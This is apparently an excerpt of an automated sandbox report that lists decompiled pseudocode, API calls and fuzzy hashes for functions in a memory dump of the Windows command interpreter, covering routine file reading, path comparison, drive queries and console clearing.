Part of subcall function 00D936CB: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,?,00D8590A,00000000), ref: 00D936F0

Part of subcall function 00D92D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,00D93C29,?,00000000,-00000001,00000000,?,00000000), ref: 00D92D87
Part of subcall function 00D92D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00D93C29,?,00000000,-00000001,00000000,?,00000000), ref: 00D92D91
Part of subcall function 00D92D22: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,00D93C29,?,00000000,-00000001,00000000,?,00000000), ref: 00D92DA4
Part of subcall function 00D92D22: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00D93C29,?,00000000,-00000001,00000000,?,00000000), ref: 00D92DAE

GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,-00000001,00000000,?,00000000), ref: 00D93CC5
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D93CD0

Part of subcall function 00D92349: wcsrchr.MSVCRT ref: 00D9234F

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Error$Mode$AttributesFileHeapLast_wcsicmpmemset$AllocCurrentDirectoryFullNamePathProcesslongjmpwcsrchr
String ID:
API String ID: 3402406610-0
Opcode ID: 696d4639eade4e2764b66f64f1acb534769074c68016d8c1fc2e5057a8d2cc32
Instruction ID: 37f4c6c4b60ad4b214afad3c25bfdfaeff84eb225ddf972e364969f849b530a6
Opcode Fuzzy Hash: 696d4639eade4e2764b66f64f1acb534769074c68016d8c1fc2e5057a8d2cc32
Instruction Fuzzy Hash: ED51B831A002169BCF24EBA4E855B7EB7F5EF48310F184059E949E7291DB70DE80DBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D8B710, Relevance: 7.6, APIs: 5, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E00D8B710(intOrPtr _a4) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				int _v556;
				char _v560;
				int _v564;
				void _v1084;
				int _v1088;
				intOrPtr _v1092;
				void* _v1096;
				char _v1100;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t41;
				intOrPtr _t43;
				int _t46;
				char _t67;
				signed int _t85;

				_t41 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t41 ^ _t85;
				_t43 = _a4;
				_t84 = 0;
				_v1092 = _t43;
				_push(0);
				_push(0xdbb8f8);
				L00D982C1();
				_t67 = 1;
				if(_t43 != 0) {
					 *0xdbb8b0 = 1;
					L12:
					return E00D96FD0(_t67, _t67, _v8 ^ _t85, _t79, 0x104, _t84);
				}
				if( *0xdc3ccc == 0) {
					if( *0xdc8058 != 0) {
						goto L2;
					}
					_t46 = 1;
					if( *0xdc3cc4 == 0) {
						L3:
						_v1088 = _t46;
						_v564 = _t84;
						_v560 = _t67;
						_v556 = 0x104;
						memset( &_v1084, _t84, 0x104);
						_v28 = _t84;
						_v24 = _t67;
						_v20 = 0x104;
						memset( &_v548, _t84, 0x104);
						_t84 = 0x7ee3;
						if(E00D90C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0 && E00D90C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
							_t63 = _v28;
							if(_v28 == 0) {
								_t63 =  &_v548;
							}
							_t76 = _v564;
							if(_v564 == 0) {
								_t76 =  &_v1084;
							}
							_t79 =  &_v1088;
							_t67 = E00D95FC8(_v1092,  &_v1088, _t76, _v556, _t63, _v20,  &_v1100,  &_v1096);
							if(_t67 == 0) {
								if(_v28 == 0) {
									_t79 =  &_v548;
								}
								_t78 = _v564;
								if(_v564 == 0) {
									_t78 =  &_v1084;
								}
								_t67 = E00D8B97C(_t78, _t79, _v1088, _v1100, _v1096);
							}
						}
						 *0xdbb8b0 = _t67;
						__imp__??_V@YAXPAX@Z(_v28);
						__imp__??_V@YAXPAX@Z(_v564);
						goto L12;
					}
				}
				L2:
				_t46 = _t84;
				goto L3;
			}

0x00d8b71b
0x00d8b722
0x00d8b725
0x00d8b72b
0x00d8b72d
0x00d8b733
0x00d8b734
0x00d8b739
0x00d8b741
0x00d8b745
0x00d99d59
0x00d8b877
0x00d8b889
0x00d8b889
0x00d8b751
0x00d99d6a
0x00000000
0x00000000
0x00d99d70
0x00d99d78
0x00d8b759
0x00d8b75e
0x00d8b76b
0x00d8b773
0x00d8b779
0x00d8b77f
0x00d8b787
0x00d8b790
0x00d8b793
0x00d8b799
0x00d8b7a9
0x00d8b7c4
0x00d8b7e7
0x00d8b7ec
0x00d99d83
0x00d99d83
0x00d8b7f2
0x00d8b7fa
0x00d99d8e
0x00d99d8e
0x00d8b811
0x00d8b82a
0x00d8b82e
0x00d8b835
0x00d8b88c
0x00d8b88c
0x00d8b837
0x00d8b83f
0x00d8b894
0x00d8b894
0x00d8b858
0x00d8b858
0x00d8b82e
0x00d8b85d
0x00d8b863
0x00d8b870
0x00000000
0x00d8b876
0x00d99d7e
0x00d8b757
0x00d8b757
0x00000000

APIs

_setjmp3.MSVCRT ref: 00D8B739
memset.MSVCRT ref: 00D8B77F
memset.MSVCRT ref: 00D8B799
??_V@YAXPAX@Z.MSVCRT ref: 00D8B863
??_V@YAXPAX@Z.MSVCRT ref: 00D8B870

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: memset$_setjmp3
String ID:
API String ID: 4215035025-0
Opcode ID: 5144f616c389331e4983e7c39ca7229b4055ec46fae3e507d9bdc8ab9f676885
Instruction ID: 57847a2e3ae32a19eedefb0019f7756e1f37053e5054fe1451c1dbaf83d2f386
Opcode Fuzzy Hash: 5144f616c389331e4983e7c39ca7229b4055ec46fae3e507d9bdc8ab9f676885
Instruction Fuzzy Hash: 1D416371A013299BDF24EB65DC94AEEBB78EF44714F0441AEE509A3201DB309E84CFB4

Uniqueness

Uniqueness Score: -1.00%

Function 00DA8F66, Relevance: 7.6, APIs: 5, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00DA8F66(void* __ecx, int __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				int _v556;
				char _v560;
				void* _v564;
				void _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t31;
				signed int _t55;
				int _t56;
				void* _t66;
				void* _t70;
				int _t71;
				signed int _t74;

				_t69 = __edx;
				_t31 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t31 ^ _t74;
				_v560 = 1;
				_t71 = 0;
				_v556 = 0x104;
				_v564 = 0;
				_t56 = __edx;
				_t70 = __ecx;
				memset( &_v1084, 0, 0x104);
				_v28 = 0;
				_v24 = 1;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				if(E00D90C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x0000fdc6) + 0x208) < 0 || E00D90C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x0000fdc6) + 0x208) < 0) {
					L13:
					__imp__??_V@YAXPAX@Z(_v28);
					__imp__??_V@YAXPAX@Z();
					return E00D96FD0(_t71, _t56, _v8 ^ _t74, _t69, _t70, _t71, _v564);
				} else {
					_t64 = _v564;
					if(_v564 == 0) {
						_t64 =  &_v1084;
					}
					_t69 = _v556;
					if(E00D92D22(_t64, _v556, _t70) == 0) {
						_t65 = _v28;
						if(_v28 == 0) {
							_t65 =  &_v548;
						}
						_t69 = _v20;
						if(E00D92D22(_t65, _v20, _t56) == 0) {
							_t55 = _v28;
							if(_t55 == 0) {
								_t55 =  &_v548;
							}
							_t66 = _v564;
							if(_t66 == 0) {
								_t66 =  &_v1084;
							}
							__imp___wcsicmp(_t66, _t55);
							asm("sbb esi, esi");
							_t71 =  ~_t55 + 1;
						}
					}
					goto L13;
				}
			}

0x00da8f66
0x00da8f71
0x00da8f78
0x00da8f83
0x00da8f8b
0x00da8f8d
0x00da8f99
0x00da8fa1
0x00da8fa3
0x00da8fa5
0x00da8fad
0x00da8fb5
0x00da8fb9
0x00da8fc5
0x00da8ff1
0x00da9082
0x00da9085
0x00da9092
0x00da90ab
0x00da901a
0x00da901a
0x00da9022
0x00da9024
0x00da9024
0x00da902a
0x00da9038
0x00da903a
0x00da903f
0x00da9041
0x00da9041
0x00da9047
0x00da9052
0x00da9054
0x00da9059
0x00da905b
0x00da905b
0x00da9061
0x00da9069
0x00da906b
0x00da906b
0x00da9073
0x00da907e
0x00da9081
0x00da9081
0x00da9052
0x00000000
0x00da9038

APIs

memset.MSVCRT ref: 00DA8FA5
memset.MSVCRT ref: 00DA8FC5

Part of subcall function 00D90C70: ??_V@YAXPAX@Z.MSVCRT ref: 00D90CBA
Part of subcall function 00D90C70: memset.MSVCRT ref: 00D90CDD

_wcsicmp.MSVCRT ref: 00DA9073
??_V@YAXPAX@Z.MSVCRT ref: 00DA9085
??_V@YAXPAX@Z.MSVCRT ref: 00DA9092

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: memset$_wcsicmp
String ID:
API String ID: 1670951261-0
Opcode ID: 25b5c9ac5990d1810cc2266cc6773e3e7124477ea0d3ec53031e4b8a9e2e8c67
Instruction ID: 1ce8b4252356fa970e500f29e6cdb0747154edc200eb5df04699e4475bf4eaf5
Opcode Fuzzy Hash: 25b5c9ac5990d1810cc2266cc6773e3e7124477ea0d3ec53031e4b8a9e2e8c67
Instruction Fuzzy Hash: 5E316572A002199BDF24DB65DC99AEEFB78EF55354F0401A9E905D3241EB349E80CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 00DA8E52, Relevance: 7.6, APIs: 5, Instructions: 103
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00DA8E52(intOrPtr __edx, long _a4, DWORD* _a8) {
				void _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				void* __ecx;
				void _t29;
				long _t38;
				void* _t39;
				signed int _t45;
				long _t46;
				void* _t52;
				void* _t54;
				intOrPtr _t57;
				void _t60;
				long _t61;

				_v16 = _v16 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_push(_t39);
				_push(_t39);
				_v12 = __edx;
				_t54 = 2;
				_t61 = E00D85DB5(_t39, _t54);
				if(_t61 == 0xffffffff) {
					_t52 = 0x6e;
					E00DA985A(_t52);
					L2:
					E00DA85E9(0, 1);
				}
				_t38 = _a4;
				while(1) {
					_t23 =  &_v8;
					__imp___get_osfhandle(0);
					if(ReadFile( &_v8, _t61, _t38, _a8, _t23) == 0) {
						break;
					}
					_t57 = _v12;
					_t29 = _v8;
					_t60 = _t29;
					_t45 =  *(_t57 + 0x1c);
					if((_t45 & 0x0000c000) == 0) {
						if(_t60 <= 2) {
							L9:
							_t45 = _t45 | 0x00008000;
						} else {
							_t57 = _v12;
							if( *_t38 != 0xfeff) {
								goto L9;
							} else {
								_t45 = _t45 | 0x00004000;
							}
						}
						 *(_t57 + 0x1c) = _t45;
					}
					if(_t60 == 0) {
						_t46 = _v16;
					} else {
						asm("sbb ecx, ecx");
						_t46 = E00DA6CEF( ~((_t45 & 0x00008002) - 0x8002) + 1, _t38,  &_v8,  &_v20);
						_t29 = _v8;
						_v16 = _t46;
					}
					if(_t29 == _a8) {
						continue;
					}
					if(_t46 == 0) {
						_t31 = _t29 - _t60;
						__imp___get_osfhandle(1);
						SetFilePointer(_t29 - _t60, _t61, _t31, _t46);
					}
					return _t61;
				}
				 *0xdc3cf0 = GetLastError();
				E00D8DB92(_t61);
				_push(0);
				_push( *0xdc3cf0);
				E00D8C5A2(_t61);
				goto L2;
			}

0x00da8e5a
0x00da8e5e
0x00da8e65
0x00da8e66
0x00da8e69
0x00da8e6c
0x00da8e72
0x00da8e77
0x00da8e7b
0x00da8e7c
0x00da8e81
0x00da8e86
0x00da8e86
0x00da8e8b
0x00da8e8e
0x00da8e90
0x00da8e99
0x00da8ea9
0x00000000
0x00000000
0x00da8eaf
0x00da8eb2
0x00da8eb5
0x00da8eb7
0x00da8ec0
0x00da8ec5
0x00da8edc
0x00da8edc
0x00da8ec7
0x00da8ecf
0x00da8ed2
0x00000000
0x00da8ed4
0x00da8ed4
0x00da8ed4
0x00da8ed2
0x00da8ee2
0x00da8ee2
0x00da8ee7
0x00da8f10
0x00da8ee9
0x00da8efe
0x00da8f06
0x00da8f08
0x00da8f0b
0x00da8f0b
0x00da8f16
0x00000000
0x00000000
0x00da8f1e
0x00da8f23
0x00da8f27
0x00da8f2f
0x00da8f2f
0x00da8f3d
0x00da8f3d
0x00da8f48
0x00da8f4d
0x00da8f52
0x00da8f54
0x00da8f5a
0x00000000

APIs

_get_osfhandle.MSVCRT ref: 00DA8E99
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00DA8EA1
_get_osfhandle.MSVCRT ref: 00DA8F27
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,00000000,00000000), ref: 00DA8F2F

Part of subcall function 00DA85E9: longjmp.MSVCRT(00DBB8F8,00000001,00000000,00DA8DAB,?,?,?,?,00000000,?,00000021,00000000,?,?,?,00000000), ref: 00DA865D
Part of subcall function 00DA85E9: memset.MSVCRT ref: 00DA86B6
Part of subcall function 00DA85E9: memset.MSVCRT ref: 00DA86E4
Part of subcall function 00DA85E9: memset.MSVCRT ref: 00DA8712

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00DA8F40

Part of subcall function 00D8DB92: _close.MSVCRT ref: 00D8DBC1

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: memset$File_get_osfhandle$ErrorLastPointerRead_closelongjmp
String ID:
API String ID: 288106245-0
Opcode ID: f7e2202c964e12108d084bf535c0b7f0c436d4330f64c2944c4c36489683abee
Instruction ID: 7eb5ce55e6757372cafc530bdb6fca5fe19f0cafcc12ad520c8b38b1e6e94936
Opcode Fuzzy Hash: f7e2202c964e12108d084bf535c0b7f0c436d4330f64c2944c4c36489683abee
Instruction Fuzzy Hash: B831E171E00206EFDB18EF64D849FAEB769EB85321F148129F911D62C0DF709E009B70

Uniqueness

Uniqueness Score: -1.00%

Function 00D85712, Relevance: 7.6, APIs: 5, Instructions: 98
fileCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00D85712(void* __ecx, long __edx, DWORD* _a4, struct _OVERLAPPED* _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v8;
				intOrPtr _v16;
				void* _t19;
				signed int _t26;
				void* _t31;
				void* _t32;
				intOrPtr* _t33;
				signed int _t43;
				intOrPtr _t52;
				void* _t54;
				struct _OVERLAPPED* _t55;
				void* _t58;
				void* _t59;

				_t55 = _a8;
				_t33 = __edx;
				_v8 = 0;
				_t59 = __ecx;
				 *0xdad5cc = 0;
				__imp___get_osfhandle(0, _t54, _t58, _t32, __ecx, __ecx);
				if(ReadFile(0, __ecx, __edx, _a4, _t55) == 0) {
					L18:
					 *0xdc3cf0 = GetLastError();
					_t19 = E00D90178(E00D8DB92(_t59));
					E00D8DB92(_a16);
					if(_t19 == 0) {
						DeleteFileW(_a20);
					}
					E00DA85E9( *0xdc3cf0, 1);
					asm("int3");
					E00D91040(_v8, _t55, _v16);
					return 0;
				} else {
					_t43 = _t55->Internal;
					if(_t43 == 0) {
						if(GetLastError() == 0x3e3) {
							goto L18;
						} else {
							_t43 = _t55->Internal;
							if(_t43 != 0) {
								goto L2;
							} else {
								 *0xdc3cf0 =  *0xdc3cf0 & _t43;
								_t31 = 0;
							}
							goto L5;
						}
					} else {
						L2:
						_t52 = _a12;
						_t26 =  *(_t52 + 0x1c);
						if((_t26 & 0x0000c000) == 0) {
							if(_t43 < 2 ||  *_t33 != 0xfeff) {
								_t26 = _t26 | 0x00008000;
							} else {
								_t26 = _t26 | 0x00004000;
							}
							 *(_t52 + 0x1c) = _t26;
						}
						if((_t26 & 0x00008002) == 0x8002) {
							E00DA6CEF(1, _t33, _t55,  &_v8);
							if(_t55->Internal != _t55->Internal) {
								 *0xdad5cc = 1;
							}
						}
						_t31 = 1;
						L5:
						return _t31;
					}
				}
			}

0x00d8571c
0x00d85726
0x00d85728
0x00d8572b
0x00d8572d
0x00d85734
0x00d85744
0x00d9974a
0x00d99752
0x00d9975f
0x00d99769
0x00d99770
0x00d99775
0x00d99775
0x00d99784
0x00d99789
0x00d99792
0x00d8583e
0x00d8574a
0x00d8574a
0x00d8574e
0x00d99709
0x00000000
0x00d9970b
0x00d9970b
0x00d9970f
0x00000000
0x00d99715
0x00d99715
0x00d9971b
0x00d9971b
0x00000000
0x00d9970f
0x00d85754
0x00d85754
0x00d85754
0x00d85757
0x00d8575f
0x00d8577f
0x00d8578b
0x00d85795
0x00d85795
0x00d85795
0x00d85790
0x00d85790
0x00d8576a
0x00d9972e
0x00d99735
0x00d9973b
0x00d9973b
0x00d99735
0x00d85772
0x00d85773
0x00d85779
0x00d85779
0x00d8574e

APIs

_get_osfhandle.MSVCRT ref: 00D85734
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00DA896D,00000021,?,?,00000000,?,?,?,?,?,00000000,?,00000021,00000000,?), ref: 00D8573C
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 00D996FE
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 00D9974A
DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,00000000,00000000), ref: 00D99775

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: ErrorFileLast$DeleteRead_get_osfhandle
String ID:
API String ID: 3588551418-0
Opcode ID: e4392948ba93e71485e4e964a806cd329ac245d3d922962ebb2319b929d80ed9
Instruction ID: 84c2c818d222615c0380af3efdd1178650bdf3c53ee11f9fc406b4e85e55dba3
Opcode Fuzzy Hash: e4392948ba93e71485e4e964a806cd329ac245d3d922962ebb2319b929d80ed9
Instruction Fuzzy Hash: 6631C075A10207DBDB18EF64EC6997EB7AAEB85340B148429E802D7394DB30DC419BB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D96A96, Relevance: 7.6, APIs: 5, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00D96A96(short __ecx) {
				signed int _v8;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				long _v28;
				char _v32;
				int _v36;
				void _v556;
				long _v564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				short _t34;
				short _t35;
				int _t38;
				WCHAR* _t39;
				void* _t50;
				short _t51;
				DWORD* _t52;
				signed int _t54;

				_t22 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t22 ^ _t54;
				_v32 = 1;
				_t52 = 0;
				_v28 = 0x104;
				_v36 = 0;
				_t51 = __ecx;
				memset( &_v556, 0, 0x104);
				if(E00D90C70( &_v556, ((0 | _v32 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
					_t34 = 0x3a;
					_v18 = _t34;
					_t35 = 0x5c;
					_v16 = _t35;
					_v14 = 0;
					_v20 = _t51;
					_t38 = GetDriveTypeW( &_v20);
					if(_t38 <= 1) {
						L8:
						_t52 = 1;
					} else {
						if(_t38 != 2 && _t38 != 5) {
							_t39 = _v36;
							if(_t39 == 0) {
								_t39 =  &_v556;
							}
							if(GetVolumeInformationW( &_v20, _t39, _v28,  &_v564, _t52, _t52, _t52, _t52) == 0) {
								if(GetLastError() == 5) {
									goto L8;
								}
							}
						}
					}
				}
				__imp__??_V@YAXPAX@Z();
				return E00D96FD0(_t52, 0x104, _v8 ^ _t54, _t50, _t51, _t52, _v36);
			}

0x00d96aa1
0x00d96aa8
0x00d96ab3
0x00d96ab7
0x00d96ab9
0x00d96ac3
0x00d96ac8
0x00d96acb
0x00d96af1
0x00d96af5
0x00d96af6
0x00d96afc
0x00d96afd
0x00d96b03
0x00d96b0b
0x00d96b0f
0x00d96b18
0x00d96b71
0x00d96b73
0x00d96b1a
0x00d96b1d
0x00d96b24
0x00d96b29
0x00d96b69
0x00d96b69
0x00d96b46
0x00da156d
0x00000000
0x00da1573
0x00da156d
0x00d96b46
0x00d96b1d
0x00d96b18
0x00d96b4f
0x00d96b68

APIs

memset.MSVCRT ref: 00D96ACB

Part of subcall function 00D90C70: ??_V@YAXPAX@Z.MSVCRT ref: 00D90CBA
Part of subcall function 00D90C70: memset.MSVCRT ref: 00D90CDD

GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,-00000001,?,?,00000000), ref: 00D96B0F
GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00D96B3E
??_V@YAXPAX@Z.MSVCRT ref: 00D96B4F

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: memset$DriveInformationTypeVolume
String ID:
API String ID: 285405857-0
Opcode ID: b6f0a715432cde24f0d806b030f750cb4784e26f908360fd1afd02fd067bb288
Instruction ID: 02c590f6674f01f008670ec24f0507916fe25ad8f16b6bd291fc668e1917c1ac
Opcode Fuzzy Hash: b6f0a715432cde24f0d806b030f750cb4784e26f908360fd1afd02fd067bb288
Instruction Fuzzy Hash: 7C21B572D00219ABCF20DBA4DC49AEFBBB8EF05754F04015AE505D3150EB35DA40CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00D90662, Relevance: 7.6, APIs: 5, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 24%

			E00D90662(signed short** __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t4;
				void* _t6;
				long _t8;
				signed int _t11;
				void* _t12;
				signed int _t15;
				long _t16;
				void* _t17;
				void* _t20;
				void* _t24;
				signed short** _t30;
				void* _t31;
				long _t33;
				void* _t34;
				signed int _t35;

				_push(__ecx);
				_t4 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t4 ^ _t35;
				_push(_t15);
				_t30 = __ecx;
				_t28 = 0x8000;
				_t19 =  *__ecx;
				_t6 = E00D8D120( *__ecx, 0x8000, __ecx);
				_t16 = _t15 | 0xffffffff;
				while(1) {
					_t33 = _t6;
					if(_t33 != _t16) {
						break;
					}
					if( *0xdc3cf0 != 2) {
						_t20 = 0x6e;
						E00DA985A(_t20);
						goto L12;
					} else {
						_t11 =  *( *_t30) & 0x0000ffff;
						if(_t11 == 0x41 || _t11 == 0x42) {
							_t12 = E00D8C5A2(_t19);
							_t24 = 0x2341;
							__imp___getch(0);
							if(_t12 == 3) {
								EnterCriticalSection( *0xdb3858);
								 *0xdad544 = 1;
								LeaveCriticalSection( *0xdb3858);
								goto L12;
							} else {
								_t19 =  *_t30;
								_t28 = 0x8000;
								_t6 = E00D8D120( *_t30, 0x8000, _t24);
								continue;
							}
						} else {
							_push(0);
							_push(0x236c);
							E00D8C5A2(_t19);
							L12:
							_t8 = _t16;
						}
					}
					L3:
					_pop(_t31);
					_pop(_t34);
					_pop(_t17);
					return E00D96FD0(_t8, _t17, _v8 ^ _t35, _t28, _t31, _t34);
				}
				__imp___get_osfhandle(0);
				SetFilePointer(_t6, _t33, _t30[2], 0);
				_t8 = _t33;
				goto L3;
			}

0x00d90667
0x00d90668
0x00d9066f
0x00d90672
0x00d90675
0x00d90677
0x00d9067d
0x00d9067f
0x00d90684
0x00d90687
0x00d90687
0x00d9068b
0x00000000
0x00000000
0x00d9cb84
0x00d9cbf6
0x00d9cbf7
0x00000000
0x00d9cb86
0x00d9cb88
0x00d9cb8e
0x00d9cbac
0x00d9cbb2
0x00d9cbb3
0x00d9cbbc
0x00d9cbd6
0x00d9cbe2
0x00d9cbec
0x00000000
0x00d9cbbe
0x00d9cbbf
0x00d9cbc1
0x00d9cbc6
0x00000000
0x00d9cbc6
0x00d9cb95
0x00d9cb95
0x00d9cb97
0x00d9cb9c
0x00d9cbfc
0x00d9cbfc
0x00d9cbfc
0x00d9cb8e
0x00d906a9
0x00d906ac
0x00d906ad
0x00d906b0
0x00d906b9
0x00d906b9
0x00d90699
0x00d906a1
0x00d906a7
0x00000000

APIs

_get_osfhandle.MSVCRT ref: 00D90699
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00D869F2,?,00000001,?,?,00000000), ref: 00D906A1

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: FilePointer_get_osfhandle
String ID:
API String ID: 1013686580-0
Opcode ID: 878e63bd06d9fdc97d2e1286049b58d1c8e9928adadd500386552e1f7b472cd8
Instruction ID: c3ffcdfea1984648069270ff4e91f470aaebbe8fafcf28614244e2ff57354701
Opcode Fuzzy Hash: 878e63bd06d9fdc97d2e1286049b58d1c8e9928adadd500386552e1f7b472cd8
Instruction Fuzzy Hash: 7A11AF32214302EFDB24AB29EC5AF29BBA5EB45724F200219F146D72E0CF71AD40D674

Uniqueness

Uniqueness Score: -1.00%

Function 00DA7EC0, Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00DA7EC0(void* __ebx, void* __edx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v30;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				struct _CHAR_INFO _v36;
				struct _COORD _v40;
				struct _SMALL_RECT _v48;
				signed int _t19;
				union %anon259 _t30;
				void* _t42;
				void* _t49;
				void* _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t50 = __edi;
				_t49 = __edx;
				_t42 = __ebx;
				_t19 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t19 ^ _t53;
				if(E00D90178(_t19 ^ _t53) != 0) {
					_push(__esi);
					_t52 = GetStdHandle(0xfffffff5);
					if(GetConsoleScreenBufferInfo(_t52,  &_v32) != 0) {
						_v40.Y =  ~_v30;
						_v40.X = 0;
						_v48.Left = 0;
						_v48.Bottom = _v30;
						_v48.Right = _v32.dwSize;
						_t30 = 0x20;
						_v36.UnicodeChar = _t30;
						_v36.Attributes = _v32.wAttributes;
						ScrollConsoleScreenBufferW(_t52,  &_v48, 0, _v40,  &_v36);
						_v32.dwCursorPosition = 0;
						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0);
					} else {
						E00D925D9(0xd83c88);
					}
					_pop(_t51);
				} else {
					E00D925D9(0xd83c88);
				}
				return E00D96FD0(0, _t42, _v8 ^ _t53, _t49, _t50, _t51);
			}

0x00da7ec0
0x00da7ec0
0x00da7ec0
0x00da7ec0
0x00da7ec8
0x00da7ecf
0x00da7edc
0x00da7eee
0x00da7ef7
0x00da7f06
0x00da7f1a
0x00da7f20
0x00da7f24
0x00da7f2b
0x00da7f35
0x00da7f39
0x00da7f3a
0x00da7f42
0x00da7f54
0x00da7f5f
0x00da7f69
0x00da7f08
0x00da7f0d
0x00da7f12
0x00da7f6f
0x00da7ede
0x00da7ee3
0x00da7ee8
0x00da7f7f

APIs

Part of subcall function 00D90178: _get_osfhandle.MSVCRT ref: 00D90183
